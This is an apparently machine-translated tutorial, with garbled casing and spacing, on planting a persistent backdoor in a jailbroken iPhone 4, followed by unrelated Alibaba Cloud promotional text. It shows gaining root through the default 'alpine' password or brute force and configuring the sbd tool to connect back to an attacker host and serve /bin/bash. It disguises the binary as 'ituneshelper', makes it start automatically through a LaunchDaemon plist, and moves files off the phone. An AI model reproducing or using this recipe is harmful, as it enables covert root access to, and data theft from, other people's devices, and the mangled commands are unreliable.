To keep a backdoor, you must enter the device. After jailbreak, modify the default OpenSSH account root password alpine. You can connect to it through ssh, and perform brute-force cracking and physical connection as long as you can achieve your goal.
We can use the sbd-1.36 backdoor of michelblomgren. (Only TCP/IP communication is supported)
1. Install iphone-gcc & make:
Iphone4 :~ Root # uname-
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root: xnu-1878.4.46 ~ 1/RELEASE_ARM_S5L8930X iPhone3, 1 arm N90AP Darwin
Iphone4 :~ Root # apt-get update
Get: 1 http://repo.biteyourapple.net./Release. gpg [490B]
Hit http://cydia.zodttd.com stable Release. gpg
Hit http://apt.saurik.com ios/675.00 Release. gpg
Hit http://repo.insanelyi.com./Release. gpg
...
Iphone4 :~ Root # apt-get install iphone-gcc
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Setting up ldid (610-5 )...
Setting up com. sull. iphone-gccheaders (1.0-11 )...
Setting up com. sull. fake-libgcc (1.0-2 )...
Setting up iphone-gcc (4.2-20080604-1-8 )...
Iphone4 :~ /Sbd-1.36 root # apt-get install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Unpacking make (from... Make_3.81-2_iphoneos-arm.deb )...
Setting up make (3.81-2 )...
2. Download the backdoor:
Iphone4 :~ Root # wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
-23:50:43-http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com | 173.160.180.156 |: 80... Connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82 K) [application/x-gzip]
Saving to: 'sbd-1.36.tar.gz'
100% [============================================== >] 84,093 66.3 K/s in 1.2 s
23:50:45 (66.3 KB/s)-'sbd-1.36.tar.gz 'saved [84093/84093]
Iphone4 :~ Root # tar-zxvf sbd-1.36.tar.gz
Sbd-1.36/
Sbd-1.36/sbd. c.
Sbd-1.36/doexec. c
Sbd-1.36/pel. c
Sbd-1.36/aes. c.
Sbd-1.36/sha1.c
Sbd-1.36/socket_code.h.
Sbd-1.36/pel. h
Sbd-1.36/aes. h.
Sbd-1.36/sha1.h
Sbd-1.36/sbd. h.
Sbd-1.36/doexec_unix.h
Sbd-1.36/doexec_win32.h
Sbd-1.36/readwrite. h.
Sbd-1.36/misc. h.
Sbd-1.36/Makefile
Sbd-1.36/mktarball. sh
Sbd-1.36/README
Sbd-1.36/COPYING
Sbd-1.36/CHANGES
Sbd-1.36/binaries/
Sbd-1.36/binaries/sbd.exe
Sbd-1.36/binaries/sbdbg.exe
Iphone4 :~ Root # sbd-1.36 cd
Iphone4 :~ Sbd-1.36 root # ls-al
Total 224
Drwx -- 3 1000 100 748 Sep 17 2004 ./
Drwxr-x-6 root wheel 272 Apr 23 ../
-Rw --- 1 1000 100 1876 Sep 17 2004 CHANGES
-Rw --- 1 1000 100 18007 Jun 8 2004 COPYING
-Rw --- 1 1000 100 2176 Jun 20 2004 Makefile
-Rw --- 1 1000 100 4880 Sep 11 2004 README
-Rw --- 1 1000 100 31370 Jun 12 2004 aes. c
-Rw --- 1 1000 100 549 Jun 11 2004 aes. h
Drwx -- 2 1000 100 136 Sep 11 2004 binaries/
-Rw --- 1 1000 100 77 Jun 2 2004 doexec. c
-Rw --- 1 1000 100 7114 Sep 11 2004 doexec_unix.h
-Rw --- 1 1000 100 19060 Sep 8 2004 doexec_win32.h
-Rw --- 1 1000 100 14968 Sep 9 2004 misc. h
-Rwx -- 1 1000 100 624 Jun 13 2004 mktarball. sh *
-Rw --- 1 1000 100 13381 Sep 8 2004 pel. c
-Rw --- 1 1000 100 898 Sep 9 2004 pel. h
-Rw --- 1 1000 100 9829 Sep 9 2004 readwrite. h
-Rw --- 1 1000 100 20557 Sep 9 2004 sbd. c
-Rw --- 1 1000 100 2014 Jun 8 2004 sbd. h
-Rw --- 1 1000 100 8900 Jun 2 2004 sha1.c
-Rw --- 1 1000 100 436 Jun 2 2004 sha1.h
-Rw --- 1 1000 100 20800 Sep 9 2004 socket_code.h
3. Sbd configuration (IP address, port, password encryption settings, connection interval, etc)
Iphone4 :~ /Sbd-1.36 root # cat sbd. h
# Define SOURCE_PORT 0
# Define CONVERT_TO_CRLF 0
# Define ENCRYPTION 1
# Define SHARED_SECRET "password"
# Define QUIET 0
# Define VERBOSE 0
# Define DAEMONIZE 0
# Define HIGHLIGHT_INCOMING 0
# Define HIGHLIGHT_PREFIX "\ x1b [0; 32m"
# Define HIGHLIGHT_SUFFIX "\ x1b [0m"
# Define SEPARATOR_BETWEEN_PREFIX_AND_DATA ":"
# Define RUN_ONLY_ONE_INSTANCE 0
# Define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"
/* Connect to 192.168.200.22 on port 443 (https) and serve/bin/bash.
* Reconnect every 10 seconds.
*/
# Define DOLISTEN 0
# Define HOST "192.168.200.22 ″
# Define PORT 443
# Define RESPAWN_ENABLED 1
# Define RESPAWN_INTERVAL 10
# Define EXECPROG "/bin/bash"
Alternatively, you can use the following parameters:
Host:./sbd-l-p 443-k 1234
Server:./sbd-r 10-q-e/bin/sh-c on-k 1234-D on 192.168.200.22 443
4. Compile
Iphone4 :~ Sbd-1.36 root # make
Usage:
Make unix-Linux, NetBSD, FreeBSD, OpenBSD
Make sunos-SunOS (Solaris)
Make win32-native win32 console app (w/Cygwin + MinGW)
Make win32bg-create a native win32 no-console app (w/Cygwin + MinGW)
Make win32bg CFLAGS =-DSTEALTH-stealthy no-console app
Make mingw-native win32 console app (w/MinGW MSYS)
Make mingwbg-native win32 no-console app (w/MinGW MSYS)
Make cygwin-Cygwin console app
Make darwin-Darwin
Iphone4 :~ Sbd-1.36 root # make darwin
Rm-f sbd sbd.exe *. o core
Gcc-Wall-Wshadow-O2-o sbd pel. c aes. c sha1.c doexec. c sbd. c
Strip sbd
Iphone4 :~ Sbd-1.36 root # ls-al sbd
-Rwxr-xr-x 1 root 100 55296 Apr 24 sbd *
5. Execute a backdoor
Iphone4 :~ /Sbd-1.36 root # cp sbd/usr/bin/ituneshelper
Iphone4 :~ Sbd-1.36 root # cd/Library/LaunchDaemons/
Iphone4:/Library/LaunchDaemons root # ls-al
Total 16
Drwxr-xr-x 2 root wheel 136 Apr 24 ./
Drwxrwxr-x 18 root admin 816 Dec 31 ../
-Rw-r-1 root wheel 847 Feb 15 2011 com. openssh. sshd. plist
Iphone4:/Library/LaunchDaemons root # cat <EOF> com. ituneshelper. start. plist
Label
Com. ituneshelper. start
ProgramArguments
/Usr/bin/ituneshelper
RunAtLoad
StartInterval
1
EOF
Iphone4:/Library/LaunchDaemons root # ls-al
Total 16
Drwxr-xr-x 2 root wheel 136 Apr 24 ./
Drwxrwxr-x 18 root admin 816 Dec 31 ../
-Rw-r-1 root wheel 404 Apr 24 com. ituneshelper. start. plist
-Rw-r-1 root wheel 847 Feb 15 2011 com. openssh. sshd. plist
6. Connection target
Root @ coresec :~ # Uname-
Linux coresec 3.0.0-17-generic # 30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
Root @ coresec :~ # Ifconfig
Eth0 Link encap: Ethernet HWaddr 00: 0c: 29: 03: 72: 5e
Inet addr: 192.168.200.22 Bcast: 192.168.200.255 Mask: 255.255.255.0
Inet6 addr: fe80: 20c: 29ff: fe03: 725e/64 Scope: Link
Up broadcast running multicast mtu: 1500 Metric: 1
RX packets: 14741 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 10042 errors: 0 dropped: 0 overruns: 0 carrier: 0
Collisions: 0 FIG: 1000
RX bytes: 20159805 (20.1 MB) TX bytes: 720669 (720.6 KB)
Root @ coresec:/home/enzo/sbd-1.36 #./sbd-l-p 443-k password
Id
Uid = 0 (root) gid = 0 (wheel) groups = 0 (wheel)
/Bin/bash-I
Bash: no job control in this shell
Bash-4.0 # ps-ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0 0. 00 ?? 0: 00. 95/sbin/launchd
0 19 1 0 0 0. 00 ?? 0: 00. 95/usr/libexec/UserEventAgent-l System
0 21 1 0 0 0. 00 ?? 0: 00. 68/usr/sbin/Yd YD
0 23 1 0 0 0. 00 ?? 0: 00. 41/usr/sbin/syslogd
0 25 1 0 0 0. 00 ?? 0: 01. 64/usr/libexec/configd
25 27 1 0. 00 ?? 0: 01. 53/System/Library/Frameworks/CoreTelephony. framework/Support/CommCenterClassic
501 29 1 0. 00 ?? 0: 12. 27/System/Library/CoreServices/SpringBoard. app/SpringBoard
501 33 1 0 0 0. 00 ?? 0: 00. 60/System/Library/PrivateFrameworks/ManagedConfiguration. framework/Support/profiled
0 37 1 0 0 0. 00 ?? 0: 00. 81/usr/libexec/lockdownd
0 43 1 0 0 0. 00 ?? 0: 00. 56/System/Library/CoreServices/powerd. bundle/powerd
0 49 1 0 0 0. 00 ?? 0: 19. 04/usr/libexec/locationd
0 55 1 0 0 0. 00 ?? 0: 00. 21/usr/bin/sbsettingsd
0 56 1 0 0 0. 00 ?? 0: 00. 69/usr/sbin/wifid
501 58 1 0. 00 ?? 0: 00. 46/System/Library/PrivateFrameworks/Ubiquity. framework/Versions/A/Support/ubd
501 71 1 0. 00 ?? 0: 01. 99/usr/sbin/mediaserverd
501 72 1 0. 00 ?? 0: 00. 13/System/Library/PrivateFrameworks/MediaRemote. framework/Support/mediaremoted
65 73 1 0. 00 ?? 0: 00. 27/usr/sbin/mDNSResponder-launchd
501 75 1 0. 00 ?? 0: 00. 87/System/Library/PrivateFrameworks/IMCore. framework/imagent. app/imagent
501 76 1 0. 00 ?? 0: 00. 45/System/Library/PrivateFrameworks/IAP. framework/Support/iapd
0 78 1 0 0 0. 00 ?? 0: 00. 13/usr/libexec/fseventsd
501 79 1 0. 00 ?? 0: 00. 92/usr/sbin/fairplayd. N90
501 80 1 0. 00 ?? 0: 01. 76/System/Library/PrivateFrameworks/DataAccess. framework/Support/dataaccessd
501 86 1 0. 00 ?? 0: 00. 45/System/Library/PrivateFrameworks/ApplePushService. framework/apsd
501 87 1 0. 00 ?? 0: 00. 34/System/Library/PrivateFrameworks/AggregateDictionary. framework/Support/aggregated
501 92 1 0. 00 ?? 0: 00. 39/usr/sbin/BTServer
501 93 1 0. 00 ?? 0: 00. 99/usr/sbin/aosyd YD
0 94 1 0 0 0. 00 ?? 0: 00. 02/usr/bin/ituneshelper
0 157 1 0 0 0. 00 ?? 0: 00. 11/usr/libexec/networkd
501 260 1 0. 00 ?? 0: 01. 94/Applications/MobileMail. app/MobileMail
501 261 1 0. 00 ?? 0: 00. 75/Applications/MobilePhone. app/MobilePhone
0 286 94 0. 00 ?? 0: 00. 03 bash
0 300 286 0. 00 ?? 0: 00. 03/bin/bash-I
0 303 300 0. 00 ?? 0: 00. 01 ps-ef
Bash-4.0 # uname-
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root: xnu-1878.4.46 ~ 1/RELEASE_ARM_S5L8930X iPhone3, 1 arm N90AP Darwin
7. file transmission
Root @ coresec:/home/enzo/sbd-1.36 # sbd-l-p 12345-k secret
> Output. file
Iphone4 :~ /Sbd-1.36 root # cat /... /... /Input. file |./sbd-k secret 192.168.200.22 12345
8. Uninstall the backdoor
Iphone4:/Library/LaunchDaemons root # rm-rf com. ituneshelper. start. plist
Iphone4:/Library/LaunchDaemons root # rm-rf/usr/bin/ituneshelper
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
